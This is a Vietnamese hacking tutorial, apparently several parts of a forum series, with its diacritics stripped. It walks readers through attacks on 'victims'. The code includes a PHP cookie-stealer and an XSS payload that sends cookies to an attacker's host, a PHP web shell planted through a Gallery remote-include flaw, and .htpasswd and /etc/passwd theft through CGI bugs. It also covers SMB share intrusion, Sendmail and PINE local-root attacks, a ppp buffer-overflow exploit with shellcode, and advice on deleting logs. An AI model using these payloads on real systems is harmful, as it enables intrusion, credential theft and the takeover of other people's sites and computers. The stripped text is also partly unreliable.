+ Tn: do ngi lp trnh web site chn + Domain: l tn min t server m cookie c to v gi i + ng dn: thng tin v ng dn web site m bn ang xem + Ngy ht hn: l thi im m cookie ht hiu lc . + Bo mt: Nu gi tr ny c thit lp bn trong cookie, thng tin s c m ho trong qu trnh truyn gia server v browser. + Cc gi tr khc: l nhng d liu c trng c web server lu tr nhn dng v sau cc gi tr ny ko cha cc khong trng, du chm, phy v b gii hn trong khong 4k. ( Ti liu ca Viethacker.net ) 21 . ) K thut ly cp cookie ca nn nhn : _ Trc ht , cc bn hy m notepad ri chp on m sau vo notepad : CODE <?php define ("LINE", "\r\n"); define ("HTML_LINE", "<br>"); function getvars($arr, $title) { $res = ""; $len = count($arr); if ($len>0) { if (strlen($title)>0) { print("[--------$title--------]" . HTML_LINE); $res .= "[--------$title--------]" . LINE; } foreach ($arr as $key => $value)

{ print("[$key]" . HTML_LINE); print($arr[$key] . HTML_LINE); $res .= "[$key]" . LINE . $arr[$key] . LINE; } } return $res; } // get current date $now = date("Y-m-d H:i:s"); // init $myData = "[-----$now-----]" . LINE; // get $myData .= getvars($HTTP_GET_VARS, ""); // file $file = $REMOTE_ADDR . ".txt"; $mode = "r+"; if (!file_exists($file)) $mode = "w+"; $fp = fopen ($file, $mode); fseek($fp, 0, SEEK_END); fwrite($fp, $myData); fclose($fp); ?> hoc CODE <?php if ($contents && $header){ mail("victim@yahoo.com" , "from mail script",$contents,$header) or die('couldnt email it'); sleep(2); ?> <script language=javascript>

</script> <?php } else { echo "nope"; } (Bn hy sa ci victim@yahoo.com thnh a ch Mail ca bn ) . Bn hy save ci notepad ny vi tn < tn tu cc bn >.php ( Nh l phi c .php ) ri upload ln mt host no c h tr PHP , trong VD ca ti l abc.php .( i vi cc bn tng lm Web chc s rt d phI khng ? ) . on m ny s c nhim v n cp thng tin (v c khi c c cookie ) ca nn nhn khi h m d liu c cha on m ny rI t ng save thng tin thnh file < ip ca nn nhn >.txt . _ Cn mt cch na ly cookie c s dng trn cc forum b li nhng cha fix , khi post bi bn chi cn thm on m sau vo bi ca mnh : CODE document.write('<img src=http://host_php/abc.php?abc='+escape(document.cooki e)+'>') vi host_php : l a ch bn upload file n cp cookie ln . v abc.php l file VD ca ti . _ V d : khi p dng trong tag img, ta dng nh sau: CODE [img]javascript: Document.write('<img src=http://host_php/docs.php?docs='+escape(document.coo kie)+'>')[/img]

hoc: [ CODE img]javascript: Document.write('&#x3cimg src=http://host_php/docs.php?docs='+escape(document.coo kie)+'&#x3e')[/img] _ Bn c th tm nhng trang web thc hnh th cch trong VD ny bng cch vo google.com tm nhng forum b li ny bng t kho "Powered by .. forum vi nhng forum sau : ikonboard, Ultimate Bulletin Board , vBulletin Board, Snitz . Nu cc bn may mn cc bn c th tm thy nhng forum cha fix li ny m thc hnh , ai tm c th chia s vi mi ngi nh . _ Cn nhiu on m n cp cookie cng hay lm , cc bn hy t mnh tm thm . 22 . ) Cch ngt mt khu bo v Website : _ Khi cc bn ti tm kim thng tin trn mt trang Web no , c mt s ch trn trang Web khi bn vo s b chn li v s xut hin mt box yu cu nhp mt khu , y chnh l khu vc ring t ct du nhng thng tin mt ch dnh cho s ngi hoc mt nhm ngi no ( Ni ct ngh hack ca viethacker.net m bo e-chip ni ti chng hn ) . Khi ta click vo ci link th ( thng thng ) n s gi ti .htpasswd v .htaccess nm cng trong th mc bo v trang Web . Ti sao phi dng du chm trc trong tn file '.htaccess'? Cc file c tn bt u l mt du chm '.' s c cc web servers xem nh l cc file cu hnh. Cc file ny s b n i (hidden) khi bn xem qua th mc c bo v bng file .htaccess .Hai h s ny c nhim v iu khin s truy nhp ti ci link an ton m bn mun xm nhp . Mt ci qun l mt khu v user name

, mt ci qun l cng vic m ho nhng thng tin cho file kia . Khi bn nhp ng c 2 th ci link mi m ra . Bn hy nhn VD sau : CODE Graham:F#.DG*m38d%RF Webmaster:GJA54j.3g9#$@f Username bn c th c c ri , cn ci pass bn nhn c hiu m t g khng ? D nhin l khng ri . bn c hiu v sao khng m bn khng th c c chng khng ? ci ny n c s can thip ca thng file .htaccess . Do khi cng trong cng th mc chng c tc ng qua li bo v ln nhau nn chng ta cng khng di g m c gng t nhp ri crack m mt khu cht tit ( khi cha c ngh crack mt khu trong tay . Ti cng ang nghin cu c th xm nhp trc tip , nu thnh cng ti s post ln cho cc bn ) . Li l y , chuyn g s xy ra nu ci .htpasswd nm ngoi th mc bo v c file .htaccess ? Ta s chm c n d dng , bn hy xem link VD sau : http://www.company.com/cgi-bin/protected/ hy kim tra xem file .htpasswd c c bo v bI .htaccess hay khng , ta nhp URL sau : http://www.company.com/cgi-bin/protected/.htpasswd Nu bn thy c cu tr lI 'File not found' hoc tng t th chc chn file ny khng c bo v , bn hy tm ra n bng mt trong cc URL sau : http://www.company.com/.htpasswd http://www.company.com/cgi-bin/.htpasswd http://www.company.com/cgi-bin/passwords/.htpasswd http://www.company.com/cgi-bin/passwd/.htpasswd

nu vn khng thy th cc bn hy c tm bng cc URL khc tng t ( c th n nm ngay th mc gc y ) , cho n khi no cc bn tm thy th thi nh . Khi tm thy file ny ri , bn hy dng chng trnh "John the ripper" hoc "Crackerjack", crack passwd ct trong . Cng vic tip theo hn cc bn bit l mnh phi lm g rI , ly user name v passwd hp l t nhp vo ri xem th my c cu tm s nhng g trong , nhng cc bn cng ng c i pass ca h hay quy h nh . Cch ny cc bn cng c th p dng ly pass ca admin v hu ht nhng thnh vin trong nhm kn u l c chc c quyn c . 23 . ) Tm hiu v CGI ? _ CGI l t vit tt ca Common Gateway Interface , a s cc Website u ang s dng chng trnh CGI ( c gI l CGI script ) thc hin nhng cng vic cn thit 24 gi hng ngy . Nhng nguyn bn CGI script thc cht l nhng chng trnh c vit v c upload ln trang Web vI nhng ngn ng ch yu l Perl , C , C++ , Vbscript trong Perl c a chung nht v s d dng trong vic vit chng trnh ,chim mt dung lng t v nht l n c th chy lin tc trong 24 gi trong ngy . _ Thng thng , CGI script c ct trong th mc /cgibin/ trn trang Web nh VD sau : http://www.company.com/cgi-bin/login.cgi vi nhng cng vic c th nh : + To ra chng trnh m s ngi gh thm . + Cho php nhng ngI khch lm nhng g v khng th lm nhng g trn Website ca bn . + Qun l user name v passwd ca thnh vin . + Cung cp dch v Mail . + Cung cp nhng trang lin kt v thc hin tin nhn qua

li gia cc thnh vin . + Cung cp nhng thng bo li chi tit .v.v.. 24 . ) Cch hack Web c bn nht thng qua CGI script : _ Li th 1 : li nph-test-cgi + nh tn trang Web b li vo trong trnh duyt ca bn . + nh dng sau vo cuI cng : /cgi-bin/nph-test-cgi + Lc trn URL bn s nhn ging nh th ny : http://www.servername.com/cgi-bin/nph-test-cgi + Nu thnh cng bn s thy cc th mc c ct bn trong . xem th mc no bn nh tip : CODE ?<tn th mc>/* + file cha passwd thng c ct trong th mc /etc , bn hy nh trn URL dng sau : http://www.servername.com/cgi-bin/nph-test-cgi?/etc/* _ Li th 2 : li php.cgi + Tng t trn bn ch cn nh trn URL dng sau ly pass : http://www.servername.com/cgi-bin/php.cgi?/etc/passwd Quan trng l y l nhng li c nn vic tm cc trang Web cc bn thc hnh rt kh , cc bn hy vo trang google.com ri nh t kho : /cgi-bin/php.cgi?/etc/passwd] hoc cgi-bin/nph-test-cgi?/etc

sau cc bn hy tm trn xem th trang no cha fix li thc hnh nh . 25 . ) K thut xm nhp my tnh ang online : _ Xm nhp my tnh ang online l mt k thut va d lI va kh . Bn c th ni d khi bn s dng cng c ENT 3 nhng bn s gp vn khi dng n l tc s dng trn my ca nn nhn s b chm i mt cch ng k v nhng my h khng share th khng th xm nhp c, do nu h tt my l mnh s b cng cc khi cha kp chm account , c mt cch m thm hn , t lm gim tc hn v c th xm nhp khi nn nhn khng share l dng chng trnh DOS tn cng . Ok , ta s bt u : _ Dng chng trnh scan IP nh ENT 3 scan IP mc tiu . _ Vo Start ==> Run g lnh cmd . _ Trong ca s DOS hy nh lnh net view <IP ca nn nhn> CODE + VD : c:\net view 203.162.30.xx _ Bn hy nhn kt qu , nu n c share th d qu , bn ch cn nh tip lnh net use < a bt k trn my ca bn> : <ip ca nn nhn>< share ca nn nhn> + VD : c:\net use E : 203.162.30.xxC _ Nu khi kt ni my nn nhn m c yu cu s dng Passwd th bn hy download chng trnh d passwd v s dng ( theo ti bn hy load chng trnh pqwak2 p dng cho vic d passwd trn my s dng HH Win98 hoc

Winme v chng trnh xIntruder dng cho Win NT ) . Ch l v cch s dng th hai chng trnh tng t nhau , dng u ta nh IP ca nn nhn , dng th hai ta nh tn a share ca nn nhn nhng i vi xIntruder ta ch chnh Delay ca n cho hp l , trong mng LAN th Delay ca n l 100 cn trong mng Internet l trn dI 5000 . _ Nu my ca nn nhn khng c share th ta nh lnh : net use < a bt k trn my ca bn> : <ip ca nn nhn>c$ (hoc d$)"administrator" + VD : net use E : 203.162.30.xxC$"administrator" Kiu chia s bng c$ l mc nh i vi tt c cc my USER l "administrator" . _ Chng ta c th p dng cch ny t nhp vo my ca c bn m mnh thm thng trm nh tm nhng d liu lin quan n a ch ca c nng ( vi iu kin l c ta ang dng my nh v bn may mn khi tm c a ch ) . Bn ch cn chat Y!Mass ri vo DOS nh lnh : c:\netstat n Khi dng cch ny bn hy tt ht cc ca s khc ch khung chat Y!Mass vi c ta thi , n s gip bn d dng hn trong vic xc nh a ch IP ca c ta . Sau bn dng cch xm nhp m ti ni trn .( C l anh chng tykhung ca chng ta hi xa khi tn tnh c bn xa qua mng cng dng cch ny t nhp v tm hiu a ch ca c ta y m , hi`hi` . ) Bn s thnh cng nu my ca nn nhn khng ci firewall hay proxy . ===================================== ===============

Nhiu bn c yu cu ti a ra a ch chnh xc cho cc bn thc tp , nhng ti khng th a ra c v rt kinh nghim nhng bi hng dn c a ch chnh xc , khi cc bn thc hnh xong ot c quyn admin c bn xo ci database ca h . Nh vy HVA s mang ting l ni bt ngun cho s ph hoi trn mng . mong cc bn thng cm , nu c th th ti ch nu nhng cch thc cc bn tm nhng da ch b li ch khng a ra a ch c th no . ===================================== =============== phn 4 ti s cp n k thut chng xm nhp vo my tnh ca mnh khi bn online , tm hiu s cc bc khi ta quyt nh hack mt trang Web , k thut tm ra li trang Web thc hnh , k thut hack Web thng qua li Gallery.v.v. GOOKLUCK!!!!!!!!! ( Ht phn 3 ) Bi vit ca ANHDENDAY y l phn 4 26 . ) Tm hiu v RPC (Remote Procedure Call) : _ Windows NT cung cp kh nng s dng RPC thc thi cc ng dng phn tn . Microsoft RPC bao gm cc th vin v cc dch v cho php cc ng dng phn tn hot ng c trong mi trng Windows NT. Cc ng dng phn tn chnh bao gm nhiu tin trnh thc thi vi nhim v xc nh no . Cc tin trnh ny c th chy trn mt hay nhiu my tnh. _Microsoft RPC s dng name service provider nh v Servers trn mng. Microsoft RPC name service provider phi i lin vi Microsoft RPC name service interface (NIS).

NIS bao bao gm cc hm API cho php truy cp nhiu thc th trong cng mt name service database (name service database cha cc thc th, nhm cc thc th, lch s cc thc th trn Server). Khi ci t Windows NT, Microsoft Locator t ng c chn nh l name service provider. N l name service provider ti u nht trn mi trng mng Windows NT. 27 . ) K thut n gin chng li s xm nhp tri php khi ang online thng qua RPC (Remote Procedure Call) : _ Nu bn nghi ng my ca mnh ang c ngi xm nhp hoc b admin remote desktop theo di , bn ch cn tt chc nng remote procedure call th hin ti khng c chng trnh no c th remote desktop theo di bn c . N cn chng c hu ht tools xm nhp vo my ( v a s cc tools vit connect da trn remote procedure call ( over tcp/ip )).Cc trojan a s cng da vo giao thc ny. Cch tt: Bn vo service /remote procedure call( click chut phi ) chn starup typt/disable hoc manual/ apply. y l cch chng rt hu hiu vi my PC , nu thm vi cch tt file sharing th rt kh b hack ) ,nhng trong mng LAN bn cng phin phc vi n khng t v bn s khng chy c cc chng trnh c lin quan n thit b ny . Ty theo cch thc bn lm vic m bn c cch chn la cho hp l . Theo ti th nu dng trong mng LAN bn hy ci mt firewall l chc chn tng i an ton ri . ( Da theo bi vit ca huynh i nh c khoai khoaimi admin ca HVA ) 28 . ) Nhng bc hack mt trang web hin nay : _ Theo lit k ca sch Hacking Exposed 3 th hack mt trang Web thng thng ta thc hin nhng bc sau :

+ FootPrinting : ( In du chn ) y l cch m hacker lm khi mun ly mt lng thng tin ti a v my ch/doanh nghip/ngi dng. N bao gm chi tit v a ch IP, Whois, DNS ..v.v i khi l nhng thong tin chnh thc c lien quan n mc tiu. Nhiu khi n gin hacker ch cn s dng cc cng c tm kim trn mng tm nhng thong tin . + Scanning : ( Qut thm d ) Khi c nhng thng tin ri, th tip n l nh gi v nh danh nhng nhng dch v m mc tiu c. Vic ny bao gm qut cng, xc nh h iu hnh, .v.v.. Cc cng c c s dng y nh nmap, WS pingPro, siphon, fscam v cn nhiu cng c khc na. + Enumeration : ( lit k tm l hng ) Bc th ba l tm kim nhng ti nguyn c bo v km, hoch ti khon ngi dng m c th s dng xm nhp. N bao gm cc mt khu mc nh, cc script v dch v mc nh. Rt nhiu ngi qun tr mng khng bit n hoc khng sa i li cc gi tr ny. + Gaining Access: ( Tm cch xm nhp ) By gi k xm nhp s tm cch truy cp vo mng bng nhng thng tin c c ba bc trn. Phng php c s dng y c th l tn cng vo li trn b m, ly v gii m file password, hay th thin nht l brute force (kim tra tt c cc trng hp) password. Cc cng c thng c s dng bc ny l NAT, podium, hoc L0pht. + Escalating Privileges : ( Leo thang c quyn ) V d trong trng hp hacker xm nhp c vo mng vi ti khon guest, th h s tm cch kim sot ton b h thng. Hacker s tm cch crack password ca admin, hoc s dng l hng leo thang c quyn. John v Riper l hai chng trnh crack password rt hay c s dng. + Pilfering : ( Dng khi cc file cha pass b s h ) Thm mt ln na cc my tm kim li c s dng tm cc phng php truy cp vo mng. Nhng file text cha password hay cc c ch khng an ton khc c th l mi ngon cho hacker.

+ Covering Tracks : ( Xo du vt ) Sau khi c nhng thng tin cn thit, hacker tm cch xo du vt, xo cc file log ca h iu hnh lm cho ngi qun l khng nhn ra h thng b xm nhp hoc c bit cng khng tm ra k xm nhp l ai. + Creating "Back Doors" : ( To ca sau chun b cho ln xm nhp tip theo c d dng hn ) Hacker li "Back Doors", tc l mt c ch cho php hacker truy nhp tr li bng con ng b mt khng phi tn nhiu cng sc, bng vic ci t Trojan hay to user mi (i vi t chc c nhiu user). Cng c y l cc loi Trojan, keylog + Denial of Service (DoS) : ( Tn cng kiu t chi dch v ) Nu khng thnh cng trong vic xm nhp, th DoS l phng tin cui cng tn cng h thng. Nu h thng khng c cu hnh ng cch, n s b ph v v cho php hacker truy cp. Hoc trong trng hp khc th DoS s lm cho h thng khng hot ng c na. Cc cng c hay c s dng tn cng DoS l trin00, Pong Of Death, teardrop, cc loi nuker, flooder . Cch ny rt li hi , v vn cn s dng ph bin hin nay . _ Tu theo hiu bit v trnh ca mnh m mt hacker b qua bc no . Khng nht thit phI lm theo tun t . Cc bn hy nh n cu bit ngi bit ta trm trn trm thng . ( Ti liu ca HVA v hackervn.net ) 29 . ) Cch tm cc Website b li : _ Chc cc bn bit n cc trang Web chuyn dng tm kim thng tin trn mng ch ? Nhng cc bn chc cng khng ng l ta c th dng nhng trang tm nhng trang Web b li ( Ti vn thng dng trang google.com v khuyn cc bn cng nn dng trang ny v n rt mnh v hiu qu ) . _ Cc bn quan tm n li trang Web v mun tm chng bn ch cn vo google.com v nh on li vo sau

allinurl : . VD ta c on m li trang Web sau : cgi-bin/php.cgi?/etc/passwd cc bn s nh : allinurl:cgi-bin/php.cgi?/etc/passwd N s lit k ra nhng trang Web ang b li ny cho cc bn , cc bn hy nhn xung di cng ca mi mu lit k ( dng a ch mu xanh l cy ) nu dng no vit y chang t kho mnh nhp vo th trang hoc ang b li .Cc bn c xm nhp vo c hay khng th cng cn tu vo trang Web fix li ny hay cha na . _ Cc bn quan tm n li forum , cc bn mun tm forum dng ny thc tp , ch cn nhp t kho powered by <tn forum> <s phin bn> VD sau l tm forum dng Snitz 2000 : powered by Snitz 2000 _ Tuy nhin , vic tm ra ng forum hoc trang Web b li theo cch c xc sut khng cao , bn hy quan tm n on string c bit trong URL c trng cho tng kiu trang Web hoc forum ( ci ny rt quan trng , cc bn hy t mnh tm hiu thm nh ) . VD tm vi li Hosting Controller th ta s c on c trng sau "/admin hay /advadmin hay /hosting" ta hy nh t kho : allinurl:/advadmin hoc allinurl:/admin hoc allinurl:/hosting

N s lit k ra cc trang Web c URL dng : http://tentrangweb.com/advadmin hoc http://tentrangweb.com/admin hoc http://tentrangweb.com/hosting VD vi forum UBB c on c trng "cgi-bin/ultimatebb.cgi?" Ta cng tm tng t nh trn . Ch cn bn bit cch tm nh vy ri th sau ny ch cn theo di thng tin cp nht bn trang Li bo mt ca HVA do bn LeonHart post hng ngy cc bn s hiu c ngha ca chng v t mnh kim tra . 30 . ) K thut hack Web thng qua li Gallery ( mt dng ca li php code inject ): _ Gallery l mt cng c cho php to mt gallery nh trn web c vit bng PHP , li dng s h ny ta c th li dng vit thm vo mt m PHP cho php ta upload , chnh l mc ch chnh ca ta . _ Trc ht bn hy ng k mt host min ph , tt nht l bn ng k brinkster.com cho d . Sau bn m notepad v to file PHP vi on m sau : CODE <?php global $PHP_SELF; echo "<html><body> <form method=post action=$PHP_SELF?$QUERY_STRING> <input type=text name=shell size=40> <input type=hidden name=act value=shell> <input type=submit value=Go name=sm> </form>"; set_magic_quotes_runtime(1); if ($act == "shell") {

echo "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n<xmp>"; system($shell); echo "</xmp>\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n" ;} echo "</body></html>"; ?> on m ny bn hy to lm 2 file c tn khc nhau ( nhng cng chung mt m ) v t tn l : + shellphp.php : file ny dng chy shell trn victim host . + init.php : file ny dng upload ln trang c host bn va to . ( Bn hy upload file init.php ny ln sm v ta s cn s dng n nhng vi on m khc , bn qun upload file ny ln l tiu ) Bn hy to thm mt file PHP vi m sau : CODE <?php function handleupload() { if (is_uploaded_file($_FILES['userfile']['tmp_name'])) { $filename = $_FILES['userfile']['tmp_name']; print "$filename was uploaded successfuly"; $realname = $_FILES['userfile']['name']; print "realname is $realname\n"; print "copying file to uploads dir ".$realname; copy($_FILES['userfile']['tmp_name'],*PATH*.$realname); [B]// lu *PATH* chng ta s thay i sau[/B] } else { echo "Possible file upload attack: filename".$_FILES['userfile']['name']."."; } } if ($act == "upload") {

handleupload(); } echo "<html><body> <form ENCTYPE=multipart/form-data method=post action=$PHP_SELF?$QUERY_STRING> File:<INPUT TYPE=FILE NAME=userfile SIZE=35> <input type=hidden name=MAX_FILE_SIZE value=1000000> <input type=hidden name=act value=upload> <input type=submit value=Upload name=sm> </form> </body></html>"; ?> Bn hy t tn l upload.php , n s dng upload ln trang Web ca nn nhn . _ Tip theo Bn vo Google, g "Powered by gallery" ri enter, Google s lit k mt ng nhng site s dng Gallery , bn hy chn ly mt trang bt k rI dng link sau th xem n cn mc lI Gallery hay khng : http://<tn trang Web ca nn nhn>/gallery./captionator.php?GALLERY_BASEDIR=http:// wwwxx.brinkster.com/<tn host bn va ng k>/ Nu bn thy hin ln mt hnh ch nht pha trn cng , bn phi ca n l lnh chuyn tip c ch Go l coi nh bn tm thy c I tng ri . By gi bn c th g lnh thng qua ch nht hack Web ca nn nhn . Trc ht bn hy g lnh pwd xc nh ng dn tuyt i n th mc hin thi ri nhn nt Go , khi n cho kt qu bn hy nhanh chng ghi li ng dn pha dI ( Ti s s dng VD ng dn ti tm thy l /home/abc/xyz/gallery ). Sau bn nh tip lnh |s a| lit k cc th mc con ca n . By gi bn hy nhn kt qu , bn s thy mt ng cc th mc con m ta lit k . Bn hy lun nh l

mc ch ca chng ta l tm mt th mc c th dng upload file upload.php m ta chun b t trc do bn hy xc nh cng ti bng cch nhn vo nhng ch cuI cng ca mi hng kt qu : + Bn hy loi b trng hp cc th mc m c du . hoc .. v y l th mc gc hoc l th mc o ( N thng c xp trn cng ca cc hng kt qu ) . + Bn cng loI b nhng hng c ch cui cng c gn ui ( VD nh config.php , check.inc .v.v ) v y l nhng file ch khng phi l th mc . + Cn li l nhng th mc c th upload nhng ti khuyn bn nn chn nhng hng cha tn th mc m c cha s ln hn 1 ( Bn c th xc nh c chng bng cch nhn ct th 2 t tri sang ) , v nh vy va chc chn y l th mc khng phi th mc o , va lm cho admin ca trang Web kh pht hin khi ta ci file ca ta vo . Ti VD ti pht hin ra th mc loveyou c cha 12 file c th cho ta upload , nh vy ng dn chnh thc m ta upload ln s l : /home/abc/xyz/Gallery/loveyou By gi bn hy vo account host ca bn, sa ni dung file init.php ging nh m ca file upload.php, nhng sa li *PATH* thnh /home/abc/xyz/gallery/loveyou/ . ng thi cng chun b mt file upload.php trn my ca bn vi *PATH* l ( 2 du ngoc kp ). By gi l ta c th upload file upload.php ln trang Web ca nn nhn c ri , bn hy nhp a ch sau trn trnh duyt Web ca bn : http://<tn trang Web ca nn nhn>/gallery./captionator.php?GALLERY_BASEDIR=http:// wwwxx.brinkster.com/<tn trang Host bn to t u>/ Bn s thy xut hin tip mt khung hnh ch nht v bn cnh l c 2 nt lnh , mt l nt brown , mt l nt upload . Nt brown bn dng dn n a ch file

upload.php bn chun b trn my ca bn , nt upload khi bn nhn vo th n s upload file upload.php ln trang Web ca nn nhn . Ok , by gi coi nh bn hon thnh chng ng hack Web ri . T by gi bn hy vn dng tn cng i th nh ly database , password ( lm tng t nh cc bi hng dn hack trc ) , nhng cc bn ch nn thc tp ch ng xo database hay ph Web ca h. Nu l mt hacker chn chnh cc bn ch cn upload ln trang Web dng ch : Hack by .. l ri . Cng nh nhng ln trc , cc bn c thnh cng hay khng cng tu thuc vo s may mn v kin tr nghin cu vn dng kin thc ca cc bn . ( Da theo hng dn hack ca huynh vnofear viethacker.net ) GOOKLUCK!!!!!!!!!!!! ( Ht phn 4 ) Bi vit ca ANHDENDAY

Ly Password File bng FTP (y l c ca HVA) Ok, cch d nht ly superuser access l bng anonymous ftp access vo trong trang web. u tin bn cn bit mt t v password files... [quote] root:User:d7Bdg:1n2HG2:1127:20:Superuser TomJones:p5Y(h0tiC:1229:20:Tom Jones,:/usr/people/tomjones:/bin/csh BBob:EUyd5XAAtv2dA:1129:20:Billy Bob:/usr/people/bbob:/bin/csh [/quote]

y l 1 th d ca mt password files m ha bnh thng. Superuser l mt trong nhng cch vo root. y l phn chnh ca file: [quote] root:x:0:1:Superuser:/: ftp:x:202:102:Anonymous ftp:/u1/ftp: ftpadmin:x:203:102:ftp Administrator:/u1/ftp [/quote] y l 1 th d khc v password file, ch khc mt ch, n c shadowed (xin li, khng bit dch lm sao ). Shadowed password files khng cho xem hay copy file password c m ha. N gy kh khn cho chng trnh ph password v to dictionary. y l 1 th d v shadowed password file: [quote] root:x:0:1:0000-Admin(0000):/:/usr/bin/csh daemon:x:1:1:0000-Admin(0000):/: bin:x:2:2:0000-Admin(0000):/usr/bin: sys:x:3:3:0000-Admin(0000):/: adm:x:4:4:0000-Admin(0000):/var/adm: lp:x:71:8:0000-lp(0000):/usr/spool/lp: smtp:x:0:0:mail daemon user:/: uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp: nuucp:x:9:9:0000uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/uucico listen:x:37:4:Network Admin:/usr/net/nls: nobody:x:60001:60001:uid no body:/: noaccess:x:60002:60002:uid no access:/: webmastr:x:53:53:WWW Admin:/export/home/webmastr:/usr/bin/csh pin4geo:x:55:55:PinPaper Admin:/export/home/webmastr/new/gregY/test/pin4geo:/bi

n/false ftp:x:54:54:Anonymous FTP:/export/home/anon_ftp:/bin/false [/quote] Shadowed password files c ch "x" trc password hoc i khi l "*". By gi bn bit nhiu hn mt cht v password file, bn c th nh ra phn pw m ha bnh thng t shadowed pw file. By gi chng ta s ni v b n. B password cng khng qu phc tp, mc d cc files khc nhau i vi mi h thng. 1. u tin phi c password file bng cch download hay copy n. 2. K tip tm chng trnh crack password v chng trnh to dictionary. C th ni gn nh khng th tm chng trnh crack nhng cng c th c vi ci tt. Bn nn dng Cracker Jack, John the Ripper, Brute Force Cracker, hoc Jack the Ripper. By gi phi c chng trnh to dictionary hoc dictionary file... Khi chy chng trnh b kha s hi bn password file. Bn dng chng trnh to dictionary to. Bn c th ti hu nh tt c cc trang hacker. Chng trnh to dictionary tt c cc cch c th ghp cc k t do bn chn (ASCII, caps, lowercase, hoc s). 3. Chy chng trnh crack, lm theo cc hng dn. K thut PHF K thut PHF l cch d nht ly password files (mc d khng hot ng trong hn 95% trng hp). thc hin ch cn nhp vo browser: [quote] http://webpage_goes_here/cgibin/phf?Qalia...t%20/etc/passwd

[/quote] Thay th webpage_goes_here vi tn ca trang. Th d bn mun ly pw file trong www.webpage.com th bn nh: [quote] http://www.webpage.com/cgibin/phf?Qalias=...t%20/etc/passwd [/quote] l xong! Ch vic ngi ch v copy (ny n hot ng). Telnet v khai thc im yu (exploits) Tt nht l bn nn c 1 account trn trang mun tn cng (nu c th) v xem xt k trang . Nhng l hng bo mt hay li trong h hng thng cho php bn xm nhp vo root. C nhiu l hng khc nhau v bn c th xt ring l chng. Ti lit k mt s l hng. L hng ny l Sendmail v.8.8.4 N to mt chng trnh /tmp/x v c th chy nh root. y l cch set up n: [quote] cat << _EOF_ >/tmp/x.c #define RUN "/bin/ksh" #include<stdio.h> main() { execl(RUN,RUN,NULL); } _EOF_ # cat << _EOF_ >/tmp/spawnfish.c main() { execl("/usr/lib/sendmail","/tmp/smtpd",0);

} _EOF_ # cat << _EOF_ >/tmp/smtpd.c main() { setuid(0); setgid(0); system("chown root /tmp/x ;chmod 4755 /tmp/x"); } _EOF_ # # gcc -O -o /tmp/x /tmp/x.c gcc -O3 -o /tmp/spawnfish /tmp/spawnfish.c gcc -O3 -o /tmp/smtpd /tmp/smtpd.c # /tmp/spawnfish kill -HUP `/usr/ucb/ps -ax|grep /tmp/smtpd|grep -v grep|sed s/"[ ]*"// |cut -d" " -f1` rm /tmp/spawnfish.c /tmp/spawnfish /tmp/smtpd.c /tmp/smtpd /tmp/x.c sleep 5 if [ -u /tmp/x ] ; then echo "leet..." /tmp/x fi [/quote] V y l mt l hng kh. Ti s ch ra cch li dng l hng PINE bng Linux. Bng cch xem process table bng ps bit user no chy PINE, sau thc hin lnh ls in /tmp/ thu thp lockfile names cho mi user. Xem process table mt ln na s hin ra mi user thot PINE hoc xem message trong INBOX. To link t /tmp/.hamors_lockfile ti ~hamors/.rhosts s lm cho PINE to ~hamors/.rhosts l file dng 666 vi ni

dung l PINE's process id. By gi c th dng lnh echo "+ +" > /tmp/.hamors_lockfile, sau rm /tmp/.hamors_lockfile. Th d, hamors l nn nhn v catluvr tn cng: [Quote ] hamors (21 19:04) litterbox:~> pine catluvr (6 19:06) litterbox:~> ps -aux | grep pine catluvr 1739 0.0 1.8 100 356 pp3 S 19:07 0:00 grep pine hamors 1732 0.8 5.7 249 1104 pp2 S 19:05 0:00 pine catluvr (7 19:07) litterbox:~> ls -al /tmp/ | grep hamors - -rw-rw-rw- 1 hamors elite 4 Aug 26 19:05 .302.f5a4 catluvr (8 19:07) litterbox:~> ps -aux | grep pine catluvr 1744 0.0 1.8 100 356 pp3 S 19:08 0:00 grep pine catluvr (9 19:09) litterbox:~> ln -s /home/hamors/.rhosts /tmp/.302.f5a4 hamors (23 19:09) litterbox:~> pine catluvr (11 19:10) litterbox:~> ps -aux | grep pine catluvr 1759 0.0 1.8 100 356 pp3 S 19:11 0:00 grep pine hamors 1756 2.7 5.1 226 992 pp2 S 19:10 0:00 pine catluvr (12 19:11) litterbox:~> echo "+ +" > /tmp/.302.f5a4 catluvr (13 19:12) litterbox:~> cat /tmp/.302.f5a4 ++ catluvr (14 19:12) litterbox:~> rm /tmp/.302.f5a4 catluvr (15 19:14) litterbox:~> rlogin litterbox.org -l hamors

[/quote] Tip theo l l hng ca li ppp. Li ny trn FreeBSD. y l cch set up n: [Quote ] #include <stdio.h> #include <stdlib.h> #include <unistd.h> #define BUFFER_SIZE 156 /* size of the bufer to overflow */ #define OFFSET -290 /* number of bytes to jump after the start of the buffer */ long get_esp(void) { ("movl %esp,%eax\n"); } main(int argc, char *argv[]) { char *buf = NULL; unsigned long *addr_ptr = NULL; char *ptr = NULL; char execshell[] = "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\ x89\x56\x0f" /* 16 bytes */ "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\ x89\xca\x52" /* 16 bytes */ "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\ x01\x01" /* 20 bytes */ "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04 \x07\x04"; /* 15 bytes, 57 total */ int i,j; buf = malloc(4096);

/* fill start of bufer with nops */ i = BUFFER_SIZE-strlen(execshell); memset(buf, 0x90, i); ptr = buf + i; /* place exploit code into the buffer */ for(i = 0; i < strlen(execshell); i++) *ptr++ = execshell; addr_ptr = (long *)ptr; for(i=0;i < (104/4); i++) *addr_ptr++ = get_esp() + OFFSET; ptr = (char *)addr_ptr; *ptr = 0; setenv("HOME", buf, 1); execl("/usr/sbin/ppp", "ppp", NULL); } [/quote] By gi bn vo c root. "What's next?" Ty bn nhng ti mun khuyn bn nn i password trc khi xa hay thay i cc th. thay i password bn phi login bng telnet v login vi account mi. Sau ch cn nh: [I]passwd n s hi pw c v pw mi. By gi ch c bn mi c pw v n c th ko di thi gian bn upload, delete logs file v lm nhng g bn mun. Rt cm n s ng h ca cc bn , v y l phn 5 31 . ) Gi tin TCP/IP l g?

